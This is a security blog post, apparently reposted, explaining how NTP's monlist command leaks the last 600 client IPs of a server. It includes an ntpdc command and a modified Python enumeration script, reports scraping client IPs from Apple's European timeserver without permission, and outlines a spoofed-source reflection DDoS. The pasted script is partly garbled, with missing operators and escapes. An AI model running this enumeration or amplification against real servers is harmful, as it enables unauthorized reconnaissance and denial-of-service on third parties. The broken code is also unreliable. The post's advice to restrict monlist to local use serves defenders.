THE NTP ISSUE [PDF Version Here]
The buzz around the internets lately has been about NTP. Security researchers, such as HD Moore, have been doing extensive investigation on the “features” of NTP. HD Moore discovered that, by default, NTP servers allow you to query them for additional information. Some of the basic queries were listpeers, show peers, peers, sysstat, and most important monlist.
Monlist is used as a diagnostic tool to provide the user the last 600 IP addresses of clients who queried that NTP server. What does this mean? This means with a single request, you can get a good feel of all the IPs in a network. Also, if there is an NTP server in the DMZ, an external attacker could potentially get the internal IPs.
FYI: I haven’t been successful with attacking Windows version of NTP.
SO WHAT’S THE TRICK:
You can install the NTP client on your favorite nix and run:
ntpdc -n -c monlist
But this seems to only work half of the time. It seems as sometimes the sequence numbers get messed up and it crashes. You can use the new auxiliary tool from metasploit (ntp_monlist) or sensepost’s python tool, but both those have issues due to payloads that do not support version 3 of ntp. They only support version 2. The best tool is included called ntp_ip_enum.txt (click to view) which is a version of the sensepost script that I had modified the payloads allowing both NTP version 2 and version 3.
When this is complete, an output file is created in the directory where the ntp_ip_enum script was run labeled NTP.txt. This will include the clients that have connected to that NTP server within the last 5 minutes or last 600 requests.
Give it a try:
This will give you a list of clients that have recently contacted Apple’s Europe timeserver. Wowzers!
SCRAPING THE INTERNETS NTP
So I took the entire client IP’s listed from time.euro.apple.com and plotted them against Google earth. This gave us some interesting views on which countries use Apple laptops and which do not.
Apple's EURO NTP Server
This could have all been averted by not allowing external users to query these types of commands. Monlist is usually used for debugging but should only be allowed locally.
HD Moore also discussed that he had figured out a way to DDoS a system using NTP with very minimal requests. Although he has not released data on this type of DDoS, we put our heads together here on what the attack could be. When you make a monlist request, you send 1 udp packet to the NTP server and 600+ responses are returned. We think that using this request against all the NTP servers and peers, you could send hundreds of thousands of UDP packets to a victim with minimal request packets. By spoofing the source address and requesting monlists repetitively, all responses from those NTP servers will be forwarded to the victim.
#!/usr/bin/env python """ Basic script to pull addresses from a NTP server using the monlist command. Can also output Maltego resultset. Gert Burger
SensePost (Pty) Ltd www.sensepost.com This work is licensed under the Creative Commons Attribution 2.5 South Africa License available at http://creativecommons.org/licenses/by/2.5/za/ Edited by SECUREPLA.NET """ from struct import unpack, pack import socket import select import sys import string OUTPUT_FORMAT='normal' #'maltego' for maltego xml or any other string for normal output DEBUG=False #Enables basic debug info TIMEOUT=2 #Read timeout in seconds TRIES=3 #Number of times to do the monlist request filename="NTP.txt" def int_ip_to_str(ip_num): return socket.inet_ntoa(pack('!L', ip_num)) def str_ip_to_int(ip): return unpack('!L',socket.inet_aton(ip)) def get_payload(): return """x17x00x02x2ax00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00""" def parse_monlist_packet(data): result = dict(response=False, more=False, error=None, records=) if len(data) 0 result['more'] = ntp_flags & (1 0 if not result['response']: #Return if its a request result['error'] = "REQUEST_PACKET" elif ntp_req_code == 42: #Check if its a monlist packet if DEBUG: print "item_size[%s] tnum_items[%s] tlen(data)[%s]" % (item_size, num_items, len(data)) if item_size != 32: result['error'] = "WRONG_ITEM_SIZE" elif num_items = TRIES: break send_payload(sock, ntp_server) return list(results) def print_maltego(results): from xml.dom.minidom import Document doc = Document() mm = doc.createElement('MaltegoMessage') doc.appendChild(mm) mtrm = doc.createElement('MaltegoTransformResponseMessage') mm.appendChild(mtrm) entities = doc.createElement('Entities') mtrm.appendChild(entities) for result in results: entity = doc.createElement('Entity') entity.setAttribute('Type', 'IPAddress') value = doc.createElement('Value') value_node = doc.createTextNode(result) value.appendChild(value_node) entity.appendChild(value) entities.appendChild(entity) output = doc.toxml() print output[output.index(" so that maltego can function if __name__ == '__main__': if len(sys.argv) > 1: targets = sys.argv[1:] else: print "Usage: %s target ntp serversnnThis script will return a unique set of IP's obtained from the list of ntp servers via the monlist command" % sys.argv sys.exit(-1) results = set() for target in targets: results.update(fetch(target)) results = sorted(results, key=str_ip_to_int) if str(OUTPUT_FORMAT).lower() == 'maltego': print_maltego(results) else: FILE = open(filename,"a") FILE.writelines("-------------------------------NTP List------------------------------") FILE.writelines("n") FILE.writelines("Target host: ") FILE.writelines(targets) FILE.writelines("n") #print "n".join(results) FILE.writelines("n".join(results)) FILE.writelines("n") FILE.writelines("Number of results %s" % len(results)) print "Completed. Check NTP.txt" #spidermark sensepostdata ntp_monlist.py
文章来源于lcx.cc:Using NTP to Enumerate Client IPs